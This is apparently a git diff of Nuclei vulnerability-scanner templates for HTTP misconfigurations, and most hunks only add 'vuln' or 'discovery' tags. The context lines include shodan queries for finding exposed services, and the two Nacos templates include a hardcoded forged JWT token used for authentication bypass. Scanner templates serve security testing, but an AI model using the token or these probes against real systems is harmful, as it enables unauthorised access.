a/http/misconfiguration/kubernetes/kube-state-metrics.yaml +++ b/http/misconfiguration/kubernetes/kube-state-metrics.yaml @@ -14,7 +14,7 @@ info: vendor: kubernetes product: kube-state-metrics shodan-query: title:Kube-state-metrics - tags: misconfig,exposure,kube-state-metrics,k8s,kubernetes + tags: misconfig,exposure,kube-state-metrics,k8s,kubernetes,vuln http: - method: GET diff --git a/http/misconfiguration/kubernetes/kubernetes-metrics.yaml b/http/misconfiguration/kubernetes/kubernetes-metrics.yaml index 8ad801ce0ff..f0581bf51da 100644 --- a/http/misconfiguration/kubernetes/kubernetes-metrics.yaml +++ b/http/misconfiguration/kubernetes/kubernetes-metrics.yaml @@ -9,7 +9,7 @@ info: - https://kubernetes.io/docs/concepts/cluster-administration/system-metrics/#metrics-in-kubernetes metadata: max-request: 1 - tags: kubernetes,exposure,devops,misconfig + tags: kubernetes,exposure,devops,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/kubernetes/kubernetes-pods-api.yaml b/http/misconfiguration/kubernetes/kubernetes-pods-api.yaml index a43bfcc2364..4220cee6c8e 100644 --- a/http/misconfiguration/kubernetes/kubernetes-pods-api.yaml +++ b/http/misconfiguration/kubernetes/kubernetes-pods-api.yaml @@ -10,7 +10,7 @@ info: - https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/ metadata: max-request: 2 - tags: k8,unauth,kubernetes,devops,misconfig + tags: k8,unauth,kubernetes,devops,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml b/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml index a93bee3b36a..acc7b5de06a 100644 --- a/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml +++ b/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml @@ -7,7 +7,7 @@ info: description: Information Disclosure of Kubernetes Resource Report metadata: max-request: 1 - tags: kubernetes,exposure,misconfig + tags: kubernetes,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/kubernetes/unauth-etcd-server.yaml b/http/misconfiguration/kubernetes/unauth-etcd-server.yaml index 30f882f9d24..227d545400e 100644 --- a/http/misconfiguration/kubernetes/unauth-etcd-server.yaml +++ b/http/misconfiguration/kubernetes/unauth-etcd-server.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: product:"etcd" - tags: tech,k8s,kubernetes,devops,etcd,unauth,anonymous,misconfig + tags: tech,k8s,kubernetes,devops,etcd,unauth,anonymous,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/label-studio-signup.yaml b/http/misconfiguration/label-studio-signup.yaml index 09358c9a206..acb9383b2a9 100644 --- a/http/misconfiguration/label-studio-signup.yaml +++ b/http/misconfiguration/label-studio-signup.yaml @@ -14,7 +14,7 @@ info: vendor: heartex product: label_studio shodan-query: http.favicon.hash:-1649949475 - tags: label-studio,sign-up,misconfig + tags: label-studio,sign-up,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/laragon-phpinfo.yaml b/http/misconfiguration/laragon-phpinfo.yaml index c58d094a876..d385983300b 100644 --- a/http/misconfiguration/laragon-phpinfo.yaml +++ b/http/misconfiguration/laragon-phpinfo.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"Laragon" html:"phpinfo" - tags: laragon,exposure,misconfig + tags: laragon,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/laravel-debug-enabled.yaml b/http/misconfiguration/laravel-debug-enabled.yaml index db77c015614..1e26f145b00 100644 --- a/http/misconfiguration/laravel-debug-enabled.yaml +++ b/http/misconfiguration/laravel-debug-enabled.yaml @@ -10,7 +10,7 @@ info: Disable Laravel's debug mode by setting APP_DEBUG to false. metadata: max-request: 1 - tags: debug,laravel,misconfig + tags: debug,laravel,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/laravel-debug-error.yaml b/http/misconfiguration/laravel-debug-error.yaml index 4fb80219d13..b4f36a75025 100644 --- a/http/misconfiguration/laravel-debug-error.yaml +++ b/http/misconfiguration/laravel-debug-error.yaml @@ -7,7 +7,7 @@ info: description: Larvel Debug method is enabled. metadata: max-request: 1 - tags: debug,laravel,misconfig + tags: debug,laravel,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/laravel-debug-infoleak.yaml b/http/misconfiguration/laravel-debug-infoleak.yaml index 8eee1ba2732..7d4b9279458 100644 --- a/http/misconfiguration/laravel-debug-infoleak.yaml +++ b/http/misconfiguration/laravel-debug-infoleak.yaml @@ -20,7 +20,7 @@ info: fofa-query: app="Laravel-Framework" product: framework vendor: laravel - tags: misconfig,laravel,debug,infoleak + tags: misconfig,laravel,debug,infoleak,vuln http: - raw: diff --git a/http/misconfiguration/laravel-horizon-unauth.yaml b/http/misconfiguration/laravel-horizon-unauth.yaml index 67a7703b066..c8b18088d56 100644 --- a/http/misconfiguration/laravel-horizon-unauth.yaml +++ b/http/misconfiguration/laravel-horizon-unauth.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:450899026 - tags: laravel,unauth,dashboard,misconfig + tags: laravel,unauth,dashboard,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/less-history.yaml b/http/misconfiguration/less-history.yaml index 3e1a0191e94..505602cd4df 100644 --- a/http/misconfiguration/less-history.yaml +++ b/http/misconfiguration/less-history.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"lesshst" - tags: misconfig,disclosure,config,files + tags: misconfig,disclosure,config,files,vuln http: - method: GET diff --git a/http/misconfiguration/libvirt-exporter-metrics.yaml b/http/misconfiguration/libvirt-exporter-metrics.yaml index a84ae99211a..89f274b2560 100644 --- a/http/misconfiguration/libvirt-exporter-metrics.yaml +++ b/http/misconfiguration/libvirt-exporter-metrics.yaml @@ -13,7 +13,7 @@ info: vendor: redhat product: libvirt shodan-query: title:"Libvirt" - tags: libvirt,exposure,debug,misconfig + tags: libvirt,exposure,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/lidarr-dashboard-unauth.yaml b/http/misconfiguration/lidarr-dashboard-unauth.yaml index d458da9b9be..42dff877c70 100644 --- a/http/misconfiguration/lidarr-dashboard-unauth.yaml +++ b/http/misconfiguration/lidarr-dashboard-unauth.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Lidarr" - tags: lidarr,dashboard,exposure + tags: lidarr,dashboard,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/liferay/liferay-api.yaml b/http/misconfiguration/liferay/liferay-api.yaml index ad8c1020661..00e85951c14 100644 --- a/http/misconfiguration/liferay/liferay-api.yaml +++ b/http/misconfiguration/liferay/liferay-api.yaml @@ -13,7 +13,7 @@ info: vendor: liferay product: liferay_portal shodan-query: title:"Liferay" - tags: liferay,exposure,api,misconfig + tags: liferay,exposure,api,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/liferay/liferay-axis.yaml b/http/misconfiguration/liferay/liferay-axis.yaml index 1392ae8e00c..f2dc91d1cb7 100644 --- a/http/misconfiguration/liferay/liferay-axis.yaml +++ b/http/misconfiguration/liferay/liferay-axis.yaml @@ -13,7 +13,7 @@ info: vendor: liferay product: liferay_portal shodan-query: title:"Liferay" - tags: misconfig,exposure,liferay,api + tags: misconfig,exposure,liferay,api,vuln http: - method: GET diff --git a/http/misconfiguration/liferay/liferay-jsonws.yaml b/http/misconfiguration/liferay/liferay-jsonws.yaml index 19bc717335e..dcb6511cbd3 100644 --- a/http/misconfiguration/liferay/liferay-jsonws.yaml +++ b/http/misconfiguration/liferay/liferay-jsonws.yaml @@ -16,7 +16,7 @@ info: vendor: liferay product: liferay_portal shodan-query: title:"Liferay" - tags: liferay,exposure,api,misconfig + tags: liferay,exposure,api,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/linkerd-ssrf-detect.yaml b/http/misconfiguration/linkerd-ssrf-detect.yaml index f21bd0b155b..772c7300424 100644 --- a/http/misconfiguration/linkerd-ssrf-detect.yaml +++ b/http/misconfiguration/linkerd-ssrf-detect.yaml @@ -9,7 +9,7 @@ info: - https://twitter.com/nirvana_msu/status/1084144955034165248 metadata: max-request: 1 - tags: ssrf,linkerd,oast,misconfig + tags: ssrf,linkerd,oast,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/linktap-gateway-exposure.yaml b/http/misconfiguration/linktap-gateway-exposure.yaml index c113cab5b96..25d2fe5d100 100644 --- a/http/misconfiguration/linktap-gateway-exposure.yaml +++ b/http/misconfiguration/linktap-gateway-exposure.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"LinkTap Gateway" - tags: misconfig,linktap,iot,exposure + tags: misconfig,linktap,iot,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/locust-exposure.yaml b/http/misconfiguration/locust-exposure.yaml index 418eaf8888c..3c6ac570335 100644 --- a/http/misconfiguration/locust-exposure.yaml +++ b/http/misconfiguration/locust-exposure.yaml @@ -13,7 +13,7 @@ info: vendor: locust product: locust shodan-query: title:"Locust" - tags: exposure,locust,misconfig + tags: exposure,locust,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/lvm-exporter-metrics.yaml b/http/misconfiguration/lvm-exporter-metrics.yaml index 174f3dc1ec1..d1b2921a59e 100644 --- a/http/misconfiguration/lvm-exporter-metrics.yaml +++ b/http/misconfiguration/lvm-exporter-metrics.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"LVM Exporter" - tags: lvm,exposure,debug,misconfig + tags: lvm,exposure,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/mailpit-app-info-disclosure.yaml b/http/misconfiguration/mailpit-app-info-disclosure.yaml index 10e62eafcc8..0991f6b1a41 100644 --- a/http/misconfiguration/mailpit-app-info-disclosure.yaml +++ b/http/misconfiguration/mailpit-app-info-disclosure.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: title:"Mailpit" - tags: mailpit,exposure,disclosure,misconfig + tags: mailpit,exposure,disclosure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/manage-cabinet-register.yaml b/http/misconfiguration/manage-cabinet-register.yaml index 3e5077e1bb0..9b554f18d3c 100644 --- a/http/misconfiguration/manage-cabinet-register.yaml +++ b/http/misconfiguration/manage-cabinet-register.yaml @@ -1,32 +1,32 @@ -id: manage-cabinet-register - -info: - name: Manage Cabinet Register - Exposed - author: noel - severity: low - description: | - The path to the Cabinet Storage is omniapp/pages/cabinet/managecabinet.jsf?Action=1. If exposed, it gives an attacker insight into information such as Storage Volume Name, Cabinet Name, it's alias, Deployed AppServer IP Address and Port - reference: - - https://www.edms-consultants.com/newgen-rlos/ - metadata: - verified: true - shodan-query: html:"omniapp" - max-request: 1 - tags: misconfig,cabinet,exposure - -http: - - method: GET - path: - - '{{BaseURL}}/omniapp/pages/cabinet/managecabinet.jsf?Action=1' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Manage Cabinet [Register Cabinet]' - - - type: status - status: +id: manage-cabinet-register + +info: + name: Manage Cabinet Register - Exposed + author: noel + severity: low + description: | + The path to the Cabinet Storage is omniapp/pages/cabinet/managecabinet.jsf?Action=1. If exposed, it gives an attacker insight into information such as Storage Volume Name, Cabinet Name, it's alias, Deployed AppServer IP Address and Port + reference: + - https://www.edms-consultants.com/newgen-rlos/ + metadata: + verified: true + shodan-query: html:"omniapp" + max-request: 1 + tags: misconfig,cabinet,exposure,vuln + +http: + - method: GET + path: + - '{{BaseURL}}/omniapp/pages/cabinet/managecabinet.jsf?Action=1' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Manage Cabinet [Register Cabinet]' + + - type: status + status: - 200 # digest: 4a0a0047304502203583ba09965590aa8bd9e59ec0bd327e16091f50132189b69f14546699d8dbef022100a2c3345437643a9e1595c3ee003c3e370d80505860e04cc201d150e64791e9d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/manage-engine-ad-search.yaml b/http/misconfiguration/manage-engine-ad-search.yaml index 103aff1015d..d814ecae3e3 100644 --- a/http/misconfiguration/manage-engine-ad-search.yaml +++ b/http/misconfiguration/manage-engine-ad-search.yaml @@ -13,7 +13,7 @@ info: vendor: zohocorp product: manageengine_admanager_plus shodan-query: title:"ManageEngine" - tags: unauth,misconfig + tags: unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/mapproxy-file-read.yaml b/http/misconfiguration/mapproxy-file-read.yaml index 9d3bc2a1bd3..dc67d1ac244 100644 --- a/http/misconfiguration/mapproxy-file-read.yaml +++ b/http/misconfiguration/mapproxy-file-read.yaml @@ -21,7 +21,7 @@ info: vendor: mapproxy product: mapproxy shodan-query: 'html:"MapProxy"' - tags: mapproxy,oss,lfi,misconfig + tags: mapproxy,oss,lfi,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/mfp-unauth-exposure.yaml b/http/misconfiguration/mfp-unauth-exposure.yaml index 77c3b6866f5..008010ccd67 100644 --- a/http/misconfiguration/mfp-unauth-exposure.yaml +++ b/http/misconfiguration/mfp-unauth-exposure.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 verified: true - tags: network,iot,printer,misconfig,escl + tags: network,iot,printer,misconfig,escl,vuln http: - method: GET diff --git a/http/misconfiguration/microsoft/anonymous-distribution-point-sccm.yaml b/http/misconfiguration/microsoft/anonymous-distribution-point-sccm.yaml index 6592364c3f6..f4a6229eea9 100644 --- a/http/misconfiguration/microsoft/anonymous-distribution-point-sccm.yaml +++ b/http/misconfiguration/microsoft/anonymous-distribution-point-sccm.yaml @@ -10,7 +10,7 @@ info: - https://www.synacktiv.com/en/publications/sccmsecretspy-exploiting-sccm-policies-distribution-for-credentials-harvesting-initial - https://github.com/badsectorlabs/sccm-http-looter - https://learn.microsoft.com/en-us/intune/configmgr/core/servers/deploy/configure/install-and-configure-distribution-points - tags: misconfig,microsoft,sccm,anonymous,distribution-point + tags: misconfig,microsoft,sccm,anonymous,distribution-point,vuln http: - method: GET diff --git a/http/misconfiguration/microsoft/aspnetcore-dev-env.yaml b/http/misconfiguration/microsoft/aspnetcore-dev-env.yaml index 3690489c4e8..5a9eced0d58 100644 --- a/http/misconfiguration/microsoft/aspnetcore-dev-env.yaml +++ b/http/misconfiguration/microsoft/aspnetcore-dev-env.yaml @@ -18,7 +18,7 @@ info: product: asp.net-core shodan-query: html:"ASPNETCORE_ENVIRONMENT" verified: true - tags: misconfig,aspnetcore,exposure + tags: misconfig,aspnetcore,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml index 1307af512bd..200ba4c0ad9 100644 --- a/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml +++ b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml @@ -22,7 +22,7 @@ info: shodan-query: http.title:outlook exchange product: exchange_server vendor: microsoft - tags: misconfig,microsoft,ms-exchange,ad,dc + tags: misconfig,microsoft,ms-exchange,ad,dc,vuln http: - method: GET diff --git a/http/misconfiguration/microsoft/ms-front-page-misconfig.yaml b/http/misconfiguration/microsoft/ms-front-page-misconfig.yaml index 14ae4dda1a3..ebb0113cfe0 100644 --- a/http/misconfiguration/microsoft/ms-front-page-misconfig.yaml +++ b/http/misconfiguration/microsoft/ms-front-page-misconfig.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true max-request: 2 - tags: misconfig,exposure,frontpage,microsoft + tags: misconfig,exposure,frontpage,microsoft,vuln http: - method: GET diff --git a/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml b/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml index cb9f7a7c983..c31d2eda402 100644 --- a/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml +++ b/http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: "明御运维审计与风险控制系统" - tags: mingyu,xmlrpc,sock,intrusive,misconfig + tags: mingyu,xmlrpc,sock,intrusive,misconfig,vuln variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/misconfiguration/misconfigured-concrete5.yaml b/http/misconfiguration/misconfigured-concrete5.yaml index de1c0099653..ff8c2323c61 100644 --- a/http/misconfiguration/misconfigured-concrete5.yaml +++ b/http/misconfiguration/misconfigured-concrete5.yaml @@ -7,7 +7,7 @@ info: description: Concrete5 CMS is misconfigured. metadata: max-request: 1 - tags: misconfig,concrete,cms + tags: misconfig,concrete,cms,vuln http: - method: GET diff --git a/http/misconfiguration/misconfigured-docker.yaml b/http/misconfiguration/misconfigured-docker.yaml index 6d85b5719d5..abdc5d47e98 100644 --- a/http/misconfiguration/misconfigured-docker.yaml +++ b/http/misconfiguration/misconfigured-docker.yaml @@ -9,7 +9,7 @@ info: - https://madhuakula.com/content/attacking-and-auditing-docker-containers-using-opensource/attacking-docker-containers/misconfiguration.html metadata: max-request: 1 - tags: misconfig,docker,unauth,devops + tags: misconfig,docker,unauth,devops,vuln http: - method: GET diff --git a/http/misconfiguration/missing-cookie-samesite-strict.yaml b/http/misconfiguration/missing-cookie-samesite-strict.yaml index ffcf48ce046..a22fa524c0a 100644 --- a/http/misconfiguration/missing-cookie-samesite-strict.yaml +++ b/http/misconfiguration/missing-cookie-samesite-strict.yaml @@ -15,7 +15,7 @@ info: metadata: verified: true max-request: 1 - tags: misconfig,samesite,cookie + tags: misconfig,samesite,cookie,vuln http: - method: GET diff --git a/http/misconfiguration/missing-sri.yaml b/http/misconfiguration/missing-sri.yaml index 16dc4c68f48..a0107a326bb 100644 --- a/http/misconfiguration/missing-sri.yaml +++ b/http/misconfiguration/missing-sri.yaml @@ -11,7 +11,7 @@ info: - https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity metadata: max-request: 1 - tags: compliance,js,css,sri,misconfig + tags: compliance,js,css,sri,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/mixed-active-content.yaml b/http/misconfiguration/mixed-active-content.yaml index f18d6a65bcc..d22b96551db 100644 --- a/http/misconfiguration/mixed-active-content.yaml +++ b/http/misconfiguration/mixed-active-content.yaml @@ -13,7 +13,7 @@ info: - https://docs.gitlab.com/ee/user/application_security/dast/checks/319.1.html metadata: max-request: 1 - tags: misconfig + tags: misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/mixed-passive-content.yaml b/http/misconfiguration/mixed-passive-content.yaml index 34c8d6a7357..cead28f0e77 100644 --- a/http/misconfiguration/mixed-passive-content.yaml +++ b/http/misconfiguration/mixed-passive-content.yaml @@ -13,7 +13,7 @@ info: - https://docs.gitlab.com/ee/user/application_security/dast/checks/319.1.html metadata: max-request: 1 - tags: misconfig + tags: misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/mlflow-unauth.yaml b/http/misconfiguration/mlflow-unauth.yaml index 06915371a16..33cee90337a 100644 --- a/http/misconfiguration/mlflow-unauth.yaml +++ b/http/misconfiguration/mlflow-unauth.yaml @@ -17,7 +17,7 @@ info: - app="mlflow" - title="mlflow" google-query: intitle:"mlflow" - tags: unauth,mlflow,oss,misconfig + tags: unauth,mlflow,oss,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/mobiproxy-dashboard.yaml b/http/misconfiguration/mobiproxy-dashboard.yaml index c1dd8157da3..d1ae0bba319 100644 --- a/http/misconfiguration/mobiproxy-dashboard.yaml +++ b/http/misconfiguration/mobiproxy-dashboard.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"MobiProxy" - tags: dashboard,exposure,mobiproxy,misconfig + tags: dashboard,exposure,mobiproxy,misconfig,discovery http: - method: GET diff --git a/http/misconfiguration/mobsf-framework-exposure.yaml b/http/misconfiguration/mobsf-framework-exposure.yaml index 779322912cf..b30ad0281de 100644 --- a/http/misconfiguration/mobsf-framework-exposure.yaml +++ b/http/misconfiguration/mobsf-framework-exposure.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"MobSF" - tags: misconfig,exposure,mobsf + tags: misconfig,exposure,mobsf,vuln http: - method: GET diff --git a/http/misconfiguration/moleculer-microservices.yaml b/http/misconfiguration/moleculer-microservices.yaml index 72ddec6a231..9aeb24cf350 100644 --- a/http/misconfiguration/moleculer-microservices.yaml +++ b/http/misconfiguration/moleculer-microservices.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Moleculer Microservices Project" - tags: misconfig,microservice,moleculer,exposure + tags: misconfig,microservice,moleculer,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/mongod-exposure.yaml b/http/misconfiguration/mongod-exposure.yaml index 16957cba383..212e21d9174 100644 --- a/http/misconfiguration/mongod-exposure.yaml +++ b/http/misconfiguration/mongod-exposure.yaml @@ -12,7 +12,7 @@ info: vendor: mongodb product: mongodb shodan-query: html:"mongod" - tags: mongod,exposure,info-leak + tags: mongod,exposure,info-leak,vuln http: - raw: diff --git a/http/misconfiguration/mongodb-exporter-metrics.yaml b/http/misconfiguration/mongodb-exporter-metrics.yaml index c6e77714691..5e604288949 100644 --- a/http/misconfiguration/mongodb-exporter-metrics.yaml +++ b/http/misconfiguration/mongodb-exporter-metrics.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: title:"MongoDB exporter" - tags: mongodb,exposure,debug,misconfig + tags: mongodb,exposure,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/ms-exchange-user-enum.yaml b/http/misconfiguration/ms-exchange-user-enum.yaml index 9f695e29b3b..92fa15aa908 100644 --- a/http/misconfiguration/ms-exchange-user-enum.yaml +++ b/http/misconfiguration/ms-exchange-user-enum.yaml @@ -17,7 +17,7 @@ info: vendor: microsoft product: exchange_server shodan-query: http.title:outlook exchange - tags: ms-exchange,microsoft,misconfig,enum + tags: ms-exchange,microsoft,misconfig,enum,vuln http: - method: GET diff --git a/http/misconfiguration/multilaser-pro-setup.yaml b/http/misconfiguration/multilaser-pro-setup.yaml index 51a7733f542..eddaf37d86a 100644 --- a/http/misconfiguration/multilaser-pro-setup.yaml +++ b/http/misconfiguration/multilaser-pro-setup.yaml @@ -13,7 +13,7 @@ info: vendor: multilaser product: ac1200_re018_firmware shodan-query: title:"Setup Wizard" http.favicon.hash:2055322029 - tags: misconfig,multilaser,setup,config + tags: misconfig,multilaser,setup,config,vuln http: - method: GET diff --git a/http/misconfiguration/mysql-history.yaml b/http/misconfiguration/mysql-history.yaml index cd4eec75e77..fd437d33b20 100644 --- a/http/misconfiguration/mysql-history.yaml +++ b/http/misconfiguration/mysql-history.yaml @@ -16,7 +16,7 @@ info: vendor: oracle product: mysql shodan-query: html:"mysql_history" - tags: misconfig,disclosure,config + tags: misconfig,disclosure,config,vuln http: - method: GET diff --git a/http/misconfiguration/mysqld-exporter-metrics.yaml b/http/misconfiguration/mysqld-exporter-metrics.yaml index 27fc34095a1..03def188ac7 100644 --- a/http/misconfiguration/mysqld-exporter-metrics.yaml +++ b/http/misconfiguration/mysqld-exporter-metrics.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: title:"MySQLd exporter" - tags: mysqld,exposure,debug,misconfig + tags: mysqld,exposure,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/nacos-authentication-bypass.yaml b/http/misconfiguration/nacos-authentication-bypass.yaml index 132bcc25108..7cfbb676927 100644 --- a/http/misconfiguration/nacos-authentication-bypass.yaml +++ b/http/misconfiguration/nacos-authentication-bypass.yaml @@ -19,7 +19,7 @@ info: shodan-query: title:"Nacos" product: nacos vendor: alibaba - tags: auth-bypass,nacos,misconfig,jwt + tags: auth-bypass,nacos,misconfig,jwt,vuln variables: token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g diff --git a/http/misconfiguration/nacos/nacos-create-user.yaml b/http/misconfiguration/nacos/nacos-create-user.yaml index 4821c6d5394..8cf5cf45e75 100644 --- a/http/misconfiguration/nacos/nacos-create-user.yaml +++ b/http/misconfiguration/nacos/nacos-create-user.yaml @@ -16,7 +16,7 @@ info: vendor: alibaba product: nacos shodan-query: title:"Nacos" - tags: misconfig,nacos,unauth,bypass,instrusive + tags: misconfig,nacos,unauth,bypass,instrusive,vuln variables: token: "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g" diff --git a/http/misconfiguration/namedprocess-exporter-metrics.yaml b/http/misconfiguration/namedprocess-exporter-metrics.yaml index 693b5761501..538f119e892 100644 --- a/http/misconfiguration/namedprocess-exporter-metrics.yaml +++ b/http/misconfiguration/namedprocess-exporter-metrics.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Named Process Exporter" - tags: namedprocess,exposure,debug,misconfig + tags: namedprocess,exposure,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/netalertx-dashboard.yaml b/http/misconfiguration/netalertx-dashboard.yaml index 3d8d7a7239c..90c00072ced 100644 --- a/http/misconfiguration/netalertx-dashboard.yaml +++ b/http/misconfiguration/netalertx-dashboard.yaml @@ -14,7 +14,7 @@ info: vendor: jokob-sk product: netalertx fofa-query: "NetAlert X" - tags: netalertx,unauth,dashboard,misconfig + tags: netalertx,unauth,dashboard,misconfig,discovery http: - method: GET diff --git a/http/misconfiguration/netdisco/netdisco-unauth.yaml b/http/misconfiguration/netdisco/netdisco-unauth.yaml index cb61ddfa432..d897af08d5f 100644 --- a/http/misconfiguration/netdisco/netdisco-unauth.yaml +++ b/http/misconfiguration/netdisco/netdisco-unauth.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: title:"Netdisco" fofa-query: title="Netdisco" - tags: netdisco,misconfig,unauth + tags: netdisco,misconfig,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/nextcloud-install.yaml b/http/misconfiguration/nextcloud-install.yaml index ce6e8b1e68b..483b5f2eeb8 100644 --- a/http/misconfiguration/nextcloud-install.yaml +++ b/http/misconfiguration/nextcloud-install.yaml @@ -9,7 +9,7 @@ info: - https://docs.nextcloud.com/server/latest/admin_manual/installation/installation_wizard.html metadata: max-request: 1 - tags: tech,nextcloud,storage,misconfig + tags: tech,nextcloud,storage,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/nextcloudpi-dashboard.yaml b/http/misconfiguration/nextcloudpi-dashboard.yaml index f244fd2b0a7..b18c757670a 100644 --- a/http/misconfiguration/nextcloudpi-dashboard.yaml +++ b/http/misconfiguration/nextcloudpi-dashboard.yaml @@ -17,7 +17,7 @@ info: product: nextcloudpi shodan-query: title:"NextcloudPi Panel" fofa-query: title="NextcloudPi Panel" - tags: nextcloud,nextcloudpi,dashboard,misconfig,exposed + tags: nextcloud,nextcloudpi,dashboard,misconfig,exposed,discovery http: - method: GET diff --git a/http/misconfiguration/nginx/nginx-api-traversal.yaml b/http/misconfiguration/nginx/nginx-api-traversal.yaml index c8a71b436f8..30f1924599e 100644 --- a/http/misconfiguration/nginx/nginx-api-traversal.yaml +++ b/http/misconfiguration/nginx/nginx-api-traversal.yaml @@ -11,7 +11,7 @@ info: - https://x.com/akshaysharma71/status/1825815869953552844 metadata: verified: true - tags: nginx,fuzz,misconfig,lfi + tags: nginx,fuzz,misconfig,lfi,vuln http: - method: GET diff --git a/http/misconfiguration/nginx/nginx-status.yaml b/http/misconfiguration/nginx/nginx-status.yaml index 5e763c81e80..28e5ad4e701 100644 --- a/http/misconfiguration/nginx/nginx-status.yaml +++ b/http/misconfiguration/nginx/nginx-status.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 2 - tags: misconfig,nginx,status + tags: misconfig,nginx,status,vuln http: - method: GET diff --git a/http/misconfiguration/nginx/nginx-vhost-traffic-status.yaml b/http/misconfiguration/nginx/nginx-vhost-traffic-status.yaml index 866bc6deb8f..0271d17d8c0 100644 --- a/http/misconfiguration/nginx/nginx-vhost-traffic-status.yaml +++ b/http/misconfiguration/nginx/nginx-vhost-traffic-status.yaml @@ -9,7 +9,7 @@ info: - https://github.com/vozlt/nginx-module-vts metadata: max-request: 1 - tags: status,nginx,misconfig + tags: status,nginx,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/ngrok-status-page.yaml b/http/misconfiguration/ngrok-status-page.yaml index 6c53aad9a5f..d54c53fd69f 100644 --- a/http/misconfiguration/ngrok-status-page.yaml +++ b/http/misconfiguration/ngrok-status-page.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"ngrok" - tags: ngrok,misconfig,status + tags: ngrok,misconfig,status,vuln http: - method: GET diff --git a/http/misconfiguration/node-exporter-metrics.yaml b/http/misconfiguration/node-exporter-metrics.yaml index fd99234ceb8..d97ab04c2e0 100644 --- a/http/misconfiguration/node-exporter-metrics.yaml +++ b/http/misconfiguration/node-exporter-metrics.yaml @@ -7,7 +7,7 @@ info: description: Information Disclosure of Garbage Collection metadata: max-request: 1 - tags: node,exposure,debug,misconfig + tags: node,exposure,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/node-express-dev-env.yaml b/http/misconfiguration/node-express-dev-env.yaml index eaba76b2258..d24802c288b 100644 --- a/http/misconfiguration/node-express-dev-env.yaml +++ b/http/misconfiguration/node-express-dev-env.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 2 shodan-query: "X-Powered-By: Express" - tags: nodejs,express,misconfig,devops,cicd,trace + tags: nodejs,express,misconfig,devops,cicd,trace,vuln flow: 